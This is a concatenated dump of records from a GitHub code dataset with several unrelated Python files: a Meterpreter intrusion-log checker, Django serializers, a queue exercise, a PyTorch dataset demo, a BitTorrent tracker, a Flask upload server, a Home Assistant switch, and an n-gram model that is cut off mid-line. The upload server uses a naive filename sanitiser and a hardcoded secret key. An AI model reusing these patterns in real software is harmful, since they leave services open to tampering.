for id in event_ids) and any(des in row[1] for des in event_des) :\n found.append(n)\n print(\"##################################\")\n print(\"%d rows processed in file: %s\"%(n,f))\n if len(found)>0:\n print(\"Found initial intrusion by meterpreter at: %s!\"%str(found))\n else:\n print(\"Not found initial intrusion by meterpreter.\")\n print()\n\nif __name__==\"__main__\":\n fi=open('tmp.pickle','rb')\n event_list=pickle.load(fi)\n fi.close()\n main(event_list)\n","repo_name":"Qingtian-Zou/AP-detection-framework","sub_path":"identifiers/drive-by-download.py","file_name":"drive-by-download.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36221250100","text":"from django.forms.models import model_to_dict\nfrom django.http import HttpResponse\n\n\n\ndef get_tro_dates_to_dict(tro_dates):\n \"\"\"Convert tro_dates into a dict ready for json serialization.\"\"\"\n vacations = tro_dates['vacations']\n unavailabilities = tro_dates['unavailabilities']\n \n vacations_as_dicts = []\n for v in vacations:\n vacation_dict = model_to_dict(v)\n vacations_as_dicts.append(vacation_dict)\n \n unavailabilities_as_dicts = []\n for u in unavailabilities:\n unavailabilities_dict = model_to_dict(u)\n unavailabilities_as_dicts.append(unavailabilities_dict)\n \n return {'vacations': vacations_as_dicts, \n 'unavailabilities': unavailabilities_as_dicts}\n \n \ndef eligable_list_to_dict(eligable_list):\n \"\"\"Convert eligable_list into a dict ready for json serialization.\n \n Args:\n eligable_list: list of sorted eligables with an availability dict and\n a sorting score.\n Returns:\n The eligible list formatted into dicts to be serialized by json.\n \"\"\"\n \n eligable_serialized_list = []\n \n for e in eligable_list['eligables']:\n eligable_serialized = {}\n eligable_serialized_list.append(eligable_serialized)\n \n # Serialize the employee model\n employee_serialized = model_to_dict(e['employee'])\n eligable_serialized['employee'] = employee_serialized\n # Serialize the availability dict\n avail_serialized = _availability_to_dict(e['availability'])\n eligable_serialized['availability'] = avail_serialized\n \n # Serialize the corresponding schedule\n serialized_schedule = model_to_dict(eligable_list['schedule'])\n \n data = {'schedule': serialized_schedule, \n 'eligable_list': eligable_serialized_list}\n \n return data\n \n \ndef _availability_to_dict(availability):\n \"\"\"Convert availability into a dict ready for json serialization.\n \n Args:\n availability: list containing django querysets and other information\n compiled by the get_availability function.\n Returns:\n Availability formatted into dicts to be serialized by json.\n \"\"\"\n \n MODEL_AVAILABILITIES = ('(S)', '(V)', '(A)', '(U)', 'Desired Times')\n avail_serialized = {}\n \n for key in MODEL_AVAILABILITIES:\n serialized_conflicts = []\n for conflict in availability[key]:\n serial_conf = model_to_dict(conflict)\n serialized_conflicts.append(serial_conf)\n \n avail_serialized[key] = serialized_conflicts\n \n avail_serialized['(O)'] = availability['(O)']\n avail_serialized['Hours Scheduled'] = availability['Hours Scheduled']\n avail_serialized['curr_hours'] =availability['curr_hours']\n \n return avail_serialized\n \n \ndef get_json_err_response(msg):\n \"\"\"Create error json response with given error message.\"\"\"\n response = HttpResponse(json.dumps({'err': msg}), \n content_type='application/json')\n response.status_code = 400\n return response\n \n \ndef date_handler(obj):\n \"\"\"Add converting instructions to JSON parser for datetime objects. \n \n Written by Anthony Hatchkins: \n http://stackoverflow.com/questions/23285558/datetime-date2014-4-25-is-not-json-serializable-in-django\n \"\"\"\n \n if hasattr(obj, 'isoformat'):\n return obj.isoformat()\n else:\n raise TypeError ","repo_name":"RyanKJ/ScheduleHours","sub_path":"schedulingcalendar/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37646979754","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'komorebi'\n\n\"\"\"\nIt is possible to implement a queue such that both enqueue and dequeue have 𝑂(1) performance on average.\nIn this case it means that most of the time enqueue and dequeue will be 𝑂(1)\nexcept in one particular circumstance where dequeue will be 𝑂(𝑛).\nuse a limited-size list to implement a queue\n\"\"\"\n\n\nclass Queue:\n def __init__(self, max_size=10):\n self.items = [None for i in range(max_size)]\n\n self.max_size = max_size\n self.length = 0\n self.front = -1\n self.rear = -1\n\n def is_empty(self):\n return self.front == self.rear is None\n\n def _is_full(self):\n if self.front == 0 and self.rear == self.max_size - 1:\n return True\n if self.front is not None and self.rear == self.front - 1:\n return True\n\n def _add_new_space(self):\n self.items.extend(None for i in range(self.max_size * 2))\n self.max_size *= 3\n\n def enqueue(self, value):\n need_to_more_space = self._is_full()\n if need_to_more_space:\n self._add_new_space()\n if self.is_empty():\n\n self.rear += 1\n self.front = self.rear\n\n elif self.front == 0 and self.rear < self.max_size - 1:\n self.rear += 1\n self.items[self.rear] = value\n elif self.front > 0 and self.rear == self.max_size - 1:\n self.rear = 0\n self.items[self.rear] = value\n else: # 0 < rear < front\n self.rear += 1\n self.items[self.rear] = value\n self.items[0] = value\n self.length += 1\n\n def dequeue(self):\n if self.is_empty():\n raise Exception('Empty queue')\n if self.front < self.max_size - 1 and self.front != self.rear:\n self.items[self.front] = None\n self.front += 1\n elif self.rear < self.front == self.max_size - 1:\n self.items[self.front] = None\n self.front = self.rear\n elif self.front == self.rear is not None: # last element\n self.items[self.front] = None\n self.front = self.rear = None\n self.length -= 1\n\n\nif __name__ == '__main__':\n q = Queue(3)\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(0)\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(1)\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(2)\n print(q.items, q.front, q.rear, q.length)\n\n q.dequeue()\n print(q.items, q.front, q.rear, q.length)\n q.dequeue()\n\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(4)\n print(q.items, q.front, q.rear, q.length)\n q.dequeue()\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(5)\n print(q.items, q.front, q.rear, q.length)\n q.dequeue()\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(6)\n print(q.items, q.front, q.rear, q.length)\n # q.enqueue(3)\n # print(q.items, q.front, q.rear, len(q.items))\n # q.enqueue(4)\n # print(q.items, q.front, q.rear, len(q.items))\n # q.enqueue(5)\n # print(q.items, q.front, q.rear, len(q.items))\n # q.enqueue(6)\n # print(q.items, q.front, q.rear, len(q.items))\n # q.enqueue(7)\n # print(q.items, q.front, q.rear, len(q.items))\n # q.enqueue(8)\n # print(q.items, q.front, q.rear, len(q.items))\n","repo_name":"lost-komorebi/Data-Structures-and-Algorithms-Python-Coding","sub_path":"stack_and_queue/exercise/queue_implementation_by_list.py","file_name":"queue_implementation_by_list.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33552716431","text":"# official documentation\n# https://pytorch.org/docs/stable/torchvision/transforms.html\n\nimport torch as t\nimport torchvision as tv\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nfrom torchvision import transforms\n\nclass WineDataset(Dataset):\n def __init__(self, transform=None):\n xy = np.loadtxt(\"data/wine/wine.csv\",\n delimiter=',',\n dtype=np.float32,\n skiprows=1)\n\n self.n_samples = xy.shape[0]\n \n self.x = xy[:, 1:]\n self.y = xy[:, [0]]\n\n self.transform = transform\n \n def __getitem__(self, index):\n sample = self.x[index], self.y[index]\n \n if self.transform:\n sample = self.transform(sample)\n \n return sample\n\n def __len__(self):\n return self.n_samples\n\n# custom transform\nclass ToTensor():\n def __call__(self, sample):\n inputs, target = sample\n return t.from_numpy(inputs), t.from_numpy(target)\n\nclass MulTransform():\n def __init__(self, factor):\n self.factor = factor\n def __call__(self, sample):\n inputs, target = sample\n inputs *= self.factor\n return inputs, target\n\ndataset = WineDataset(transform=ToTensor())\nfirst_data = dataset[0]\nfeature, labels = first_data\nprint(type(feature), type(labels))\n\ncomposed = tv.transforms.Compose([\n ToTensor(),\n MulTransform(2)\n])\n\ndataset = WineDataset(transform=composed)\nfirst_data = dataset[0]\nfeature, labels = first_data\nprint(type(feature), type(labels))","repo_name":"koochak-mehdi/PyTorch_Basics","sub_path":"04_dataset_and_transforms.py","file_name":"04_dataset_and_transforms.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40839191931","text":"import torrent_parser\nimport hashlib, os, time\n\n\nimport flask\n\nimport sys\n\nfrom database import Database\n\nimport json, utils_tracker, socket, threading\n\nfrom utils_tracker import get_key\n\ndef _print(text, flag='a'):\n with open(\"tracker_trace\", flag) as f:\n f.write(f\"{text}\\n\")\n\ndef get_infohash(metainfo):\n return hashlib.sha1(torrent_parser.encode(metainfo[\"info\"])).hexdigest()\n\nclass Tracker:\n # 6666\n def attend_clients(self):\n sock = socket.socket()\n sock.bind((self.database.ip, 6660))\n sock.listen(256)\n\n def attend(client):\n while True:\n try:\n msg = client.recv(1024)\n except: continue\n if not msg:\n break\n # threading._start_new_thread(self.proccess_message, ())\n threading.current_thread()._delete()\n\n def attend_saved(sock):\n try:\n attend(c)\n except Exception as ex:\n print('EXCEPCION EN attend_clients')\n print(ex)\n threading.current_thread()._delete()\n\n while True:\n c, _ = sock.accept()\n threading._start_new_thread(attend_saved, (c,))\n\n def proccess_message(self, data, addr):\n if data['operation'] == 'DISCOVER':\n ip, port = str(data['ip']), int(data['port'])\n sock = socket.socket()\n try:\n sock.connect((ip, port))\n server_ip = self.database.ip\n my_addr = server_ip, 5000\n sock.send(json.dumps(my_addr).encode())\n except: pass\n sock.close()\n threading.current_thread()._delete()\n\n def attend_new_nodes(self):\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind((self.database.ip, 6666))\n while True:\n try:\n msg, _ = sock.recvfrom(1024)\n except Exception as e:\n print('EXCEPCION EN attend_new_nodes')\n print(e)\n continue\n\n if msg is not None:\n data = json.loads(msg)\n addr = data['sender'][1], data['sender'][2]\n threading._start_new_thread(self.proccess_message, (data, addr))\n\n def __init__(self, ip, port=5050, request_interval=5, min_interval=5):\n self.database = Database(ip, port)\n threading._start_new_thread(self.attend_clients, ())\n threading._start_new_thread(self.attend_new_nodes, ())\n\n def build_response(self, request):\n answer = {}\n answer[\"peers\"] = self.database[get_key(request['name'] + request['infohash'] + 'peers')]\n answer[\"peers\"] = answer[\"peers\"] if answer[\"peers\"] else []\n return answer\n\n\napp = flask.Flask(__name__)\n\nTRACKER = None\n\n@app.route('/announce')\ndef announce():\n response = TRACKER.build_response(flask.request.args)\n return json.dumps(response)\n\n@app.route('/have//////', methods=[\"PUT\"])\ndef have(client_id, ip, port, portion, name, infohash):\n TRACKER.database[name + infohash + \"peers\"] = utils_tracker.assign(data={\"ip\": ip, \"port\": int(port), \"id\": client_id}, to_update=True)\n return \"\"\n\n@app.route('/search')\ndef search():\n pattern_torrents_keys_dic = TRACKER.database[utils_tracker.INDEX_KEY]\n name = flask.request.args[\"name\"]\n \n torrent_keys = []\n if name in pattern_torrents_keys_dic:\n torrent_keys = pattern_torrents_keys_dic[name]\n\n metainfos = []\n for key in torrent_keys:\n metainfo = TRACKER.database[key]\n metainfos.append(metainfo)\n return json.dumps(metainfos)\n\n@app.route('/metainfo///', methods=[\"POST\"])\ndef metainfo(client_id, ip, port):\n if flask.request.method == \"POST\":\n metainfo_encoded = flask.request.data\n metainfo_decoded = torrent_parser.decode(metainfo_encoded)\n name = metainfo_decoded[\"info\"][\"name\"]\n infohash = get_infohash(metainfo_decoded)\n\n #Real app\n TRACKER.database[name + infohash + \"metainfo\"] = utils_tracker.assign(metainfo_decoded, name)\n TRACKER.database[name + infohash + \"peers\"] = utils_tracker.assign({\"ip\": ip, \"port\": int(port), \"id\": client_id}, to_update=True)\n\n return \"\"\n\nif __name__ == \"__main__\":\n #real app\n import argparse, socket\n parser = argparse.ArgumentParser()\n parser.add_argument('-ip', '--ip', type=str, default=None)\n parser.add_argument('-port', '--port', type=int, default=5050)\n\n args = parser.parse_args()\n IP = args.ip\n port = int(args.port)\n\n if not IP:\n hostname = socket.gethostname()\n IP = socket.gethostbyname(hostname)\n\n TRACKER = Tracker(IP, port)\n\n # TRACKER = Tracker(\"localhost\", 5000)\n\n app.run(host=IP, port=5000)","repo_name":"ginrod/bittorrent","sub_path":"tracker/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6640525289","text":"#!/usr/bin/env python3\n\nimport os\n\nfrom flask import Flask, flash, request, redirect, url_for, send_from_directory\n\n\nUPLOAD_FOLDER = os.path.join(os.path.dirname(__file__), 'uploads')\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['SECRET_KEY'] = b'\\xbe\\x08\\xed\\x13\\xe0\\xc4\\xf3\\x06\\x02I\\xefp\\xebX\\xfb.'\n\n\ndef secure_filename(filename):\n return filename.split('/').pop()\n\n\ndef render_form():\n return \"\"\"\n \n \n UPload new File\n \n
\n \n \n
\n \n \n \"\"\"\n\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n if 'file' not in request.files:\n app.logger.warning('No file part')\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n if file.filename == '':\n app.logger.warning('No selected file')\n flash('No selected file')\n return redirect(request.url)\n\n app.logger.warning('received new file %s' % file.filename)\n filename = secure_filename(file.filename)\n app.logger.warning('A new file uploaded: %s' % filename)\n save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n file.save(save_path)\n app.logger.warning('%s save success' % save_path)\n\n return redirect(url_for('download_file', name=filename))\n\n return render_form()\n\n\n\n@app.route('/uploads/')\ndef download_file(name):\n return send_from_directory(app.config['UPLOAD_FOLDER'], name)\n\napp.add_url_rule(\n \"/uploads/\", endpoint=\"download_file\", build_only=True\n)\n\n\ndef create_app():\n return app\n\nif __name__ == '__main__':\n app.run(port=5000)\n","repo_name":"raojinlin/fileuploads","sub_path":"fileuploads.py","file_name":"fileuploads.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27406911092","text":"from oricrete.folding2 import \\\n YoshimuraCreasePattern, CnstrTargetFace, Folding, Initialization, FormFinding, CreasePatternView, \\\n fix, r_, s_, t_\n\nimport numpy as np\n\nL_x = 8.0\nL_y = 6.0\nv = 1.0\n\ncp = YoshimuraCreasePattern(L_x=L_x, L_y=6, n_x=2, n_y=4)\n\nn_corners = cp.N_h[(0, 0, -1, -1), (0, -1, 0, -1)].flatten()\nn_vertical_boundaries = cp.N_h[(0, -1), 1].flatten()\nn_horizontal_boundaries = cp.N_h[1, (0, -1)].flatten()\nn_midnode = cp.N_h[1,1].flatten()\nn_left_right = cp.N_v.flatten()\nn_i = cp.N_i.flatten()\n\nall_fixed = np.unique( np.hstack([n_corners \n ,\n ]) )\n\n# vault_height = [([(cp.N_h[0, 0], 0, L_x), (cp.N_h[0, 0], 1, -L_y)], 0),\n# ([(cp.N_h[-1, 0], 0, L_x), (cp.N_h[-1, 0], 1, L_y)], 0),\n# ([(cp.N_h[-1, -1], 0, L_x), (cp.N_h[-1, -1], 1, -L_y)], 0),\n# ([(cp.N_h[0, -1], 0, L_x), (cp.N_h[0, -1], 1, L_y)], 0),\n# ([(cp.N_h[2, 0], 2, 1.0), (cp.N_h[2, -1], 2, -1.0)], 0),\n# ([(cp.N_h[3, 0], 2, 1.0), (cp.N_h[3, -1], 2, -1.0)], 0),\n# ([(cp.N_h[3, 0], 2, 1.0), (cp.N_h[2, 0], 2, -1.0)], 0),\n# ([(cp.N_h[0, 2], 2, 1.0), (cp.N_h[-1, 2], 2, -1.0)], 0),\n# ]\n\nface_z_t = CnstrTargetFace(F=[r_, s_, -0.6 * t_ * (r_ * (1 - r_ / L_x) + s_ * (1 - s_ / L_y))])\ninit = Initialization(cp=cp, tf_lst=[(face_z_t, cp.N)], t_init=0.1)\nfold = FormFinding(source=init,\n goal_function_type='potential_energy',\n n_steps=1,\n MAX_ITER=30,\n #tf_lst=[(face_z_t, cp.N)],\n dof_constraints=fix(all_fixed, [0,1,2]) \\\n + fix(n_left_right,[0]) \\\n + fix(n_vertical_boundaries, [0,1,2]) \\\n + fix(n_horizontal_boundaries,[0,1]) \\\n + fix(n_midnode,[2],-0.5) \\\n + fix(n_i,[0]) \\\n + fix(n_midnode,[0,1])\n )\n# dof_constraints=fix([0, 1], [0], v) + fix([0, 1, 6, 7], [2]) + \\\n# fix([0], [1]) + fix([6, 7], [0], -v))\nfold.u_t[-1]\n\ncpw = CreasePatternView(root=init)\ncpw.configure_traits()\n","repo_name":"simvisage/oricrete","sub_path":"docs/use_cases/ycp02_3x5_poteng_ff_dev.py","file_name":"ycp02_3x5_poteng_ff_dev.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"19222099073","text":"from __future__ import annotations\nfrom cgitb import handler\nfrom cmath import e\nfrom importlib import resources\n\nimport logging\n\nimport http.client\nimport sys\nfrom logging import handlers\nfrom typing import OrderedDict\nimport voluptuous as vol\n\nfrom homeassistant.components.switch import PLATFORM_SCHEMA, SwitchEntity\nfrom homeassistant.const import CONF_HOST, CONF_NAME, CONF_PORT, CONF_RESOURCES\nfrom homeassistant.core import HomeAssistant\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.typing import ConfigType, DiscoveryInfoType\n\nDOMAIN = \"http_switch\"\n\n_LOGGER = logging.getLogger(__name__)\n\n\nDEFAULT_NAME = \"httpswitch\"\nDEFAULT_PORT = 8080\nDEFAULT_RESOURCES={}\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(\n {\n vol.Required(CONF_HOST): cv.string,\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,\n vol.Required(CONF_RESOURCES, default=DEFAULT_RESOURCES): cv.match_all,\n }\n)\n\n\ndef setup_platform(\n hass: HomeAssistant,\n config: ConfigType,\n add_entities: AddEntitiesCallback,\n discovery_info: DiscoveryInfoType | None = None,\n) -> None:\n \"\"\"Read in all of our configuration, and initialize the loopback switch.\"\"\"\n name = config.get(CONF_NAME)\n host = config.get(CONF_HOST)\n port = config.get(CONF_PORT)\n resources = config.get(CONF_RESOURCES)\n hass.data.setdefault(DOMAIN, {})\n\n for resource, handlers in resources.items():\n add_entities([HttpResource(host, port, resource, handlers)], True)\n\n\nclass HttpResource(SwitchEntity):\n\n def __init__(self, host, port, resource, handlers):\n self._name = resource\n self._handlers = {}\n self._enabled = False\n for h in [\"turn_on\", \"turn_off\", \"update\"]:\n if h in handlers:\n self._handlers[h] = RemoteHandler(h, host, port, resource, handlers[h])\n else:\n self._handlers[h] = DummyHandler(h)\n\n @property\n def available(self):\n return True\n\n @property\n def name(self):\n \"\"\"Return the name of the switch.\"\"\"\n return self._name\n\n @property\n def is_on(self):\n \"\"\"Return true if device is on.\"\"\"\n return self._enabled\n\n def turn_on(self, **kwargs):\n \"\"\"Turn the device on.\"\"\"\n self._handlers[sys._getframe().f_code.co_name].call()\n self._enabled = True\n return True\n\n def turn_off(self, **kwargs):\n \"\"\"Turn the device off.\"\"\"\n self._handlers[sys._getframe().f_code.co_name].call()\n self._enabled = False\n return True\n\n def update(self):\n \"\"\"Refresh state in case an alternate process modified this data.\"\"\"\n try:\n self._handlers[sys._getframe().f_code.co_name].call()\n except:\n _LOGGER.warning(\"Exception when updating state\")\n return False\n return True\n\n\nclass DummyHandler:\n\n def __init__(self, name):\n self._name = name\n\n def call(self):\n _LOGGER.debug(\"Dummy Handler %s called\", self._name)\n return True\n\n\nclass RemoteHandler:\n\n def __init__(self, name, host, port, path, cfg):\n self._name = name\n self._host = host\n self._port = port\n self._path = path\n self._cfg = cfg\n\n def call(self):\n _LOGGER.debug(\"Remote Handler %s called: %s %s %s %s\", self._name, self._host, self._port, self._path, self._cfg)\n connection = http.client.HTTPConnection(\"%s:%s\" %(self._host, self._port))\n connection.request(\"GET\", \"/%s/%s\" % (self._path, self._cfg))\n response = connection.getresponse()\n connection.close()\n _LOGGER.debug(\"Remote response %s %s\", response.getcode(), response.read().decode())\n return response.getcode() == 200","repo_name":"majduk/raspberry-media-center","sub_path":"homeassistant/custom_components/http_switch/switch.py","file_name":"switch.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3423043251","text":"from Tokenizer import *\nfrom collections import defaultdict\nimport math\nimport argparse\n\nall_kn_prob = []\n\ndef fourgram_prob(sentences,frequency_of_word,arg,verbose =False ):\n \n\n\n #divide the data into trainig and test randomly \n\n training_data_sentences = sentences[:int(len(sentences)*0.5)]\n test_data_sentences = sentences[int(len(sentences)*0.5):]\n \n fourgram_count = {}\n frequency_of_word[\"\"] = 3*len(training_data_sentences)\n frequency_of_word[\"\"] = len(training_data_sentences)\n # print(frequency_of_word[\"\"])\n vocab_size = len(frequency_of_word)\n total_words = 0\n freq_4gram = defaultdict(int)\n context_freq_4gram = defaultdict(int)\n contexts_4gram = defaultdict(set)\n discount_4gram = defaultdict(float)\n numofcontextwithfrequency_4gram = defaultdict(int)\n\n freq_3gram = defaultdict(int)\n context_freq_3gram = defaultdict(int)\n contexts_3gram = defaultdict(set)\n discount_3gram = defaultdict(float)\n numofcontextwithfrequency_3gram = defaultdict(int)\n\n freq_2gram = defaultdict(int)\n context_freq_2gram = defaultdict(int)\n contexts_2gram = defaultdict(set)\n discount_2gram = defaultdict(float)\n numofcontextwithfrequency_2gram = defaultdict(int)\n # if verbose:\n # print(\"Calculating fourgram count\")\n\n\n\n\n #data for 4-gram\n # training_data_sentences = sentences[:int(len(sentences)*0.8)]\n\n for sentence in training_data_sentences:\n\n\n # print(sentence)\n\n words = sentence.split()\n words = [''] * 3 + words + ['']\n if words[0] == ''and words[1]=='' and words[2]=='' and words[3] == '':\n #remove empty strings\n #remove words words at inde x\n words.remove(words[0])\n words.remove(words[0])\n words.remove(words[0])\n words.remove(words[0])\n # print(words)\n\n if(len(sentence) == 0):\n #remove emtpty sentences\n training_data_sentences.remove(sentence)\n continue\n\n\n words = [word for word in words if word != '']\n\n for i in range(len(words)-3):\n if(words[i+3] == '' or words[i+3] == ' ' or words[i+3] == None):\n words.remove(words[i+3])\n continue\n total_words +=1 \n if(words[i+3] == ''):\n continue\n context = tuple(words[i:i+3])\n word = words[i+3]\n freq_4gram[(context, word)] += 1\n context_freq_4gram[context] += 1\n contexts_4gram[context].add(word) \n \n\n #data for 3 gram\n words = sentence.split()\n words = [''] * 2 + words + ['']\n \n if words[0] == ''and words[1]=='' and words[2] == '':\n words.remove(words[0])\n words.remove(words[0])\n words.remove(words[0])\n # print(words)\n if(len(sentence) == 0):\n continue\n # words = [word for word in words if word != '']\n for i in range(len(words)-2):\n if(words[i+2] == '' or words[i+2] == ' ' or words[i+2] == None):\n words.remove(words[i+2])\n continue\n if(words[i+2] == ''):\n continue\n context = tuple(words[i:i+2])\n word = words[i+2]\n # print(\"***************\")\n # print(context , word )\n # freq_3gram.setdefault((context, word), 0)\n freq_3gram[(context, word)] += 1\n # print(freq_3gram[(context, word)])\n context_freq_3gram[context] += 1\n contexts_3gram[context].add(word)\n\n\n\n #data for 2 gram\n words = sentence.split()\n words = [''] + words + ['']\n if words[0] == '' and words[1] == '':\n #remove empty strings\n #remove words words at inde x\n words.remove(words[0])\n words.remove(words[0])\n # print(words)\n\n if(len(sentence) == 0):\n continue\n\n\n \n for i in range(len(words)-1):\n if(words[i+1] == '' or words[i+1] == ' ' or words[i+1] == None):\n words.remove(words[i+1])\n continue \n if(words[i+1] == ''):\n continue\n context = tuple(words[i:i+1])\n word = words[i+1]\n freq_2gram[(context, word)] += 1\n context_freq_2gram[context] += 1\n contexts_2gram[context].add(word)\n \n \n #caclculating valuof numofcontextwithfrequency_4gram\n for context in context_freq_4gram:\n count = context_freq_4gram[context]\n numofcontextwithfrequency_4gram[count] += 1\n\n #caclculating valuof numofcontextwithfrequency_3gram\n for context in context_freq_3gram:\n count = context_freq_3gram[context]\n numofcontextwithfrequency_3gram[count] += 1\n\n #caclculating valuof numofcontextwithfrequency_2gram\n for context in context_freq_2gram:\n count = context_freq_2gram[context]\n numofcontextwithfrequency_2gram[count] += 1\n\n #calculating discount value for 4-gram\n \n \n # count = context_freq_4gram[context]\n a = numofcontextwithfrequency_4gram[1]/(numofcontextwithfrequency_4gram[1]+2*numofcontextwithfrequency_4gram[2])\n #discount value for 4-gram\n \n discount_4gram_constant = min(1 , 4 - (5*a* numofcontextwithfrequency_4gram[5]/numofcontextwithfrequency_4gram[4]))\n\n\n #calculating discount value for 3-gram\n \n b = numofcontextwithfrequency_3gram[1]/(numofcontextwithfrequency_3gram[1]+2*numofcontextwithfrequency_3gram[2])\n discount_3gram_constant = min(1 , 3 - (4*b* numofcontextwithfrequency_3gram[4]/numofcontextwithfrequency_3gram[3]))\n\n #calculating discount value for 2-gram\n c = numofcontextwithfrequency_2gram[1]/(numofcontextwithfrequency_2gram[1]+2*numofcontextwithfrequency_2gram[2])\n discount_2gram_constant = min(1 , 2 - (3*c* numofcontextwithfrequency_2gram[3]/numofcontextwithfrequency_2gram[2]))\n\n d = numofcontextwithfrequency_2gram[1]/(numofcontextwithfrequency_2gram[1]+2*numofcontextwithfrequency_2gram[2])\n discount_1gram_constant = min(1 , 1 - (2*d* numofcontextwithfrequency_2gram[2]/numofcontextwithfrequency_2gram[1]))\n #calculating discount value for 4-gram\n \n if(arg==\"kn\"):\n\n\n def kn_4gram_prob(context, word):\n numerator = max(freq_4gram[(context, word)] - discount_4gram_constant,0)\n denominator = context_freq_4gram[context]\n if denominator == 0:\n return (discount_4gram_constant/len(frequency_of_word))* kn_3gram_backoff(context[1:], word)\n lamda = len(contexts_4gram[context])*discount_4gram_constant / context_freq_4gram[context]\n return numerator/denominator + lamda *kn_3gram_backoff(context[1:], word)\n # print(context ,word)\n def kn_3gram_backoff(context, word):\n numerator = max(0 ,freq_3gram[(context, word)] - discount_3gram_constant)\n denominator = context_freq_3gram[context]\n if denominator == 0:\n return (discount_3gram_constant/len(frequency_of_word))* kn_2gram_backoff(context[1:], word)\n lamda = discount_3gram_constant*len(contexts_3gram[context]) / context_freq_3gram[context]\n return numerator/denominator + lamda *kn_2gram_backoff(context[1:], word)\n \n\n\n def kn_2gram_backoff(context, word):\n numerator = max(0,freq_2gram[(context, word)] - discount_2gram_constant)\n denominator = context_freq_2gram[context]\n if denominator == 0:\n return (discount_2gram_constant/len(frequency_of_word))* kn_1gram_backoff(word)\n lamda = discount_2gram_constant*len(contexts_2gram[context]) / context_freq_2gram[context]\n return numerator/denominator + lamda *kn_1gram_backoff(word)\n \n def kn_1gram_backoff( word):\n \n\n if(word not in frequency_of_word):\n return 0.000000009\n # return frequency_of_word['']/total_words\n else:\n \n return frequency_of_word[word]/total_words\n return kn_4gram_prob \n if(arg==\"wb\"):\n #written -bell smoothing\n\n def wb_4_gram(context,word):\n numerator = freq_4gram[(context, word)]\n denominator = context_freq_4gram[context] \n if denominator+ len(contexts_4gram[context]) == 0:\n lamda = 0 \n return (1-lamda)*wb_3gram_backoff(context[1:], word)\n g = (len(contexts_4gram[context])/((len(contexts_4gram[context])) + denominator ))\n lamda = 1 - g\n return lamda*numerator/denominator + (1-lamda)*wb_3gram_backoff(context[1:], word) \n\n\n def wb_3gram_backoff(context, word):\n numerator = freq_3gram[(context, word)]\n denominator = context_freq_3gram[context] \n if denominator + len(contexts_3gram[context]) == 0:\n lamda = 0 \n return (1-lamda)*wb_2gram_backoff(context[1:], word)\n lamda = 1 -(len(contexts_3gram[context])/((len(contexts_3gram[context])) + denominator ))\n return (lamda*numerator/denominator) + (1-lamda)*wb_2gram_backoff(context[1:], word)\n \n def wb_2gram_backoff(context, word):\n numerator = freq_2gram[(context, word)]\n denominator = context_freq_2gram[context] \n if denominator + len(contexts_2gram[context]) == 0:\n lamda = 0 \n return (1-lamda)*wb_1gram_backoff(word)\n lamda = 1 -(len(contexts_2gram[context])/((len(contexts_2gram[context])) + denominator ))\n return (lamda*numerator/denominator) + (1-lamda)*wb_1gram_backoff(word)\n\n\n def wb_1gram_backoff(word):\n c_of_word = frequency_of_word[word]\n prob_ml = c_of_word/total_words\n n_0 = len(frequency_of_word)\n prob = (prob_ml*total_words)/(total_words+ n_0) + (1/(c_of_word+n_0))\n return prob \n \n\n return wb_4_gram\n \n \n\n # def kn_recurse_backoff(context, word):\n # # print(context ,word)\n\n # if len(context) == 3:\n # return kn_4gram_prob(context, word)\n # elif len(context) == 2:\n # return kn_3gram_backoff(context, word)\n # elif len(context) == 1:\n # return kn_2gram_backoff(context, word)\n # else:\n # return kn_1gram_backoff(context, word)\n\n\n # def kn_4gram_logscore(sentence):\n \n # tokens = sentence.split()\n # padded_tokens = ['', '', ''] + tokens + ['']\n # logprob = 0.0\n # for i in range(len(padded_tokens) - 3):\n # context = tuple(padded_tokens[i:i+3])\n # token = padded_tokens[i+3]\n # logprob += math.log(kn_recurse_backoff(context, token))\n # return logprob\n # \n\n\n # def perplexity_kneser():\n # perplexity = 0\n # for sentence in training_data_sentences:\n # print(\"fd\")\n \n\n\n # hi = 0 \n # return perplexity\n \n\ndef perplexity_kn(n , tokenised_curpus ,all_probs,log_prob_kn):\n all_perplexity =[]\n for sentence in tokenised_curpus:\n per = 0\n for i in range(len(sentence)-n+1):\n if(tuple(sentence[i:i+n]) in all_probs.keys()):\n 